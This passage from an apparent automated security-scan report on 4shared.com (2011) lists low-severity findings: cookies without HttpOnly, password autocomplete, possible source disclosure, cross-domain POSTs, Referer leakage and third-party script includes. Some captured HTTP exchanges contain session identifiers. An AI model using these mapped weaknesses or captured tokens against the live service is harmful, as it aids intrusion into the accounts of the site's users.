* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

6.149. http://www.4shared.com/js/loginScript.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/loginScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1956124399; Expires=Mon, 26-Jul-2021 14:05:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:07 GMT; Path=/
Set-Cookie: hostid=1956124399; Expires=Mon, 26-Jul-2021 14:05:07 GMT; Path=/
Vary: *
Content-Type: text/javascript
Content-Length: 1346
Date: Fri, 29 Jul 2011 14:05:06 GMT

function clearLogin(){
var field=document.getElementById('loginfield');
if (field.value=="your e-mail") {
field.value="";
field.className = field.className.replace("fieldhint
...[SNIP]...

6.150. http://www.4shared.com/js/signup-script.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/signup-script.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=1332572779; Expires=Mon, 26-Jul-2021 14:05:03 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:03 GMT; Path=/
Set-Cookie: hostid=1332572779; Expires=Mon, 26-Jul-2021 14:05:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:03 GMT
Vary: *
Content-Type: text/javascript
Content-Length: 3516
Date: Fri, 29 Jul 2011 14:05:03 GMT

function checkForm(form) {
var form=document.theForm;
if (form.login.value==null || form.login.value.length==0) {
alert ("You did not enter your e-mail address");
form.
...[SNIP]...

6.151. http://www.4shared.com/js/sysinfo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/js/sysinfo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

hostid=45943599; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/sysinfo.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:32 GMT; Path=/
Set-Cookie: hostid=45943599; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:32 GMT
ETag: W/"2351-1295256546000"
Last-Modified: Mon, 17 Jan 2011 09:29:06 GMT
Content-Type: text/javascript
Content-Length: 2351
Date: Fri, 29 Jul 2011 13:59:32 GMT

// Information that needs to be collected are setup as variables.

var Agent = navigator.userAgent;
var Available_Height = screen.availHeight;
var Available_Width =screen.availWidth;
var Browser_
...[SNIP]...

6.152. http://www.4shared.com/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

fp=4sess_p50722b1a_t20110729-145755_; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

6.153. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
ppVisitDate=1311947946262; Domain=.4shared.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

6.154. http://www.4shared.com/signup.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ppVisited=%2Fsignup.jsp; Domain=.4shared.com; Path=/
ppVisitDate=1311947872791; Domain=.4shared.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7. Password field with autocomplete enabled previous next
There are 6 instances of this issue:

/
/
/enter.jsp
/enter.jsp
/login.jsp
/signup.jsp

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

7.1. http://www.4shared.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.4shared.com/index.jsp

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
<div style="padding:9px;">
<form name="signUpForm" action="http://www.4shared.com/index.jsp" method="post" class="openid">
<input type="hidden" name="sId" value="f5uzfaHd0sNGJlVU" />
...[SNIP]...
<td><input type="password" name="password" id="regpassfield" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...
<td><input type="password" name="password2" id="regpassfield2" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...

7.2. http://www.4shared.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.4shared.com/index.jsp

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.3. http://www.4shared.com/enter.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The page contains a form with the following action URL:

https://www.4shared.com/enter.jsp

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
</center>
<form name="signupForm" class="openid" action="https://www.4shared.com/enter.jsp" method="post" onsubmit="return checkForm(document.signupForm)">
<input type="hidden" name="submitType" value="signup"/>
...[SNIP]...
<td><input type="password" name="password" class="regfield" style="width:210px"></td>
...[SNIP]...
<td><input type="password" name="password2" class="regfield" style="width:210px"></td>
...[SNIP]...

7.4. http://www.4shared.com/enter.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The page contains a form with the following action URL:

http://www.4shared.com/enter.jsp

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.5. http://www.4shared.com/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/login.jsp

Issue detail

The page contains a form with the following action URL:

http://www.4shared.com/index.jsp

The form contains the following password field with autocomplete enabled:

password

Request

Response

7.6. http://www.4shared.com/signup.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/signup.jsp

Issue detail

The page contains a form with the following action URL:

https://www.4shared.com/signup.jsp

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

8. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.4shared.com
Path:	/sla.jsp

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: WWW_JSESSIONID=D5D751E65CD9BFC9F8E424330A106857.dc328; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 24527
Date: Fri, 29 Jul 2011 14:08:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Service Lev
...[SNIP]...
<a href="mailto:<%=ServerFacade.getSupportEmail()%>">
...[SNIP]...

9. Cross-domain POST previous next
There are 9 instances of this issue:

/premium.jsp
/premium.jsp
/premium.jsp
/premium.jsp
/premium.jsp
/premium.jsp
/premium.jsp
/premium.jsp
/premium.jsp

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

9.1. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

payment3m
payment3m

Request

Response

9.2. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
custom
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.3. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

payment6m
payment6m

Request

Response

9.4. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

payment1m
payment1m

Request

Response

9.5. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
custom
buyer_credit_promo_code
buyer_credit_product_category
buyer_credit_shipping_method
buyer_credit_user_address_change
no_shipping
no_note
currency_code
lc
bn
a3
p3
t3
src
sra

Request

Response

9.6. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
custom
buyer_credit_promo_code
buyer_credit_product_category
buyer_credit_shipping_method
buyer_credit_user_address_change
no_shipping
no_note
currency_code
lc
bn
a3
p3
t3
src
sra

Request

Response

9.7. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
custom
buyer_credit_promo_code
buyer_credit_product_category
buyer_credit_shipping_method
buyer_credit_user_address_change
no_shipping
no_note
currency_code
lc
bn
a3
p3
t3
src
sra

Request

Response

9.8. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
custom
amount
no_shipping
no_note
currency_code
lc
bn

Request

Response

9.9. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page contains a form which POSTs data to the domain www.plimus.com. The form contains the following fields:

payment12m
payment12m

Request

Response

10. Cross-domain Referer leakage previous next
There are 2 instances of this issue:

/enter.jsp
/premium.jsp

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

10.1. http://www.4shared.com/enter.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.4shared.com/enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1

The response contains the following links to other domains:

http://c.statcounter.com/4135125/0/e8ecc2ac/1/
http://edge.quantserve.com/quant.js
http://openid.net/
http://pixel.quantserve.com/pixel/p-23Fqia_-MkKko.gif
http://twitter.com/
http://www.facebook.com/official.4shared
http://www.quantcast.com/p-23Fqia_-MkKko
http://www.statcounter.com/counter/counter.js
http://www.statcounter.com/free_hit_counter.html

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
<input type="text" name="openid" id="openid" class="regfield openid_url" style="width:172px"/>
<a href="http://openid.net/" class="float" target="_blank"><img src="http://static.4shared.com/images/icons/16x16/howto.gif" alt="" width="16" height="16" class="absmid" />
...[SNIP]...
<br />
<a href="http://twitter.com/#!/4shared" target="_blank" title="Follow us on Twitter" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="tw">
...[SNIP]...
<br />
<a href="http://www.facebook.com/official.4shared" target="_blank" title="Follow us on Facebook" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="fb">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<div class="statcounter">
<a title="free hit counter" href="http://www.statcounter.com/free_hit_counter.html" target="_blank">
<img class="statcounter" src="http://c.statcounter.com/4135125/0/e8ecc2ac/1/" alt="free hit counter" >
</a>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-23Fqia_-MkKko" target="_blank">
<img src="http://pixel.quantserve.com/pixel/p-23Fqia_-MkKko.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast">
</a>
...[SNIP]...

10.2. http://www.4shared.com/premium.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/premium.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.4shared.com/premium.jsp?ref=header

The response contains the following links to other domains:

http://c.statcounter.com/4135125/0/e8ecc2ac/1/
http://directory.itmsecure.com/directory/4shared-com/
http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/pixel/p-23Fqia_-MkKko.gif
http://twitter.com/
http://www.facebook.com/official.4shared
http://www.quantcast.com/p-23Fqia_-MkKko
http://www.statcounter.com/counter/counter.js
http://www.statcounter.com/free_hit_counter.html

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...
<div align="center" style="margin:15px 0">
<a href="http://directory.itmsecure.com/directory/4shared-com/" target="_blank"><img src="http://static.4shared.com/images/ITMseal.png" width="64" height="37" alt="ITMSecure trust mark" />
...[SNIP]...
<br />
<a href="http://twitter.com/#!/4shared" target="_blank" title="Follow us on Twitter" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="tw">
...[SNIP]...
<br />
<a href="http://www.facebook.com/official.4shared" target="_blank" title="Follow us on Facebook" rel="nofollow"><img src="http://static.4shared.com/images/spacer.gif" alt="Twitter" class="fb">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<div class="statcounter">
<a title="free hit counter" href="http://www.statcounter.com/free_hit_counter.html" target="_blank">
<img class="statcounter" src="http://c.statcounter.com/4135125/0/e8ecc2ac/1/" alt="free hit counter" >
</a>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-23Fqia_-MkKko" target="_blank">
<img src="http://pixel.quantserve.com/pixel/p-23Fqia_-MkKko.gif" style="display: none" border="0" height="1" width="1" alt="Quantcast">
</a>
...[SNIP]...

11. Cross-domain script include previous next
There are 20 instances of this issue:

/
/desktop/
/enter.jsp
/enterprise/
/icons/16x16/doc.gif
/icons/16x16/pdf.gif
/icons/16x16/png.gif
/images/asf-logo.gif
/images/tomcat.gif
/images/void.gif
/js/'%20+%20img%20+%20'
/js/'%20+%20val%20+%20'
/login.jsp
/m/
/m/iphone.jsp
/premium.jsp
/remindPassword.jsp
/requestCall.jsp
/signup.jsp
/sla.jsp

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

11.1. http://www.4shared.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.2. http://www.4shared.com/desktop/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/desktop/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

GET /desktop/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 43981
Date: Fri, 29 Jul 2011 13:57:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4sh
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11.3. http://www.4shared.com/enter.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enter.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://www.statcounter.com/counter/counter.js

Request

Response

11.4. http://www.4shared.com/enterprise/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.4shared.com
Path:	/enterprise/

Issue detail

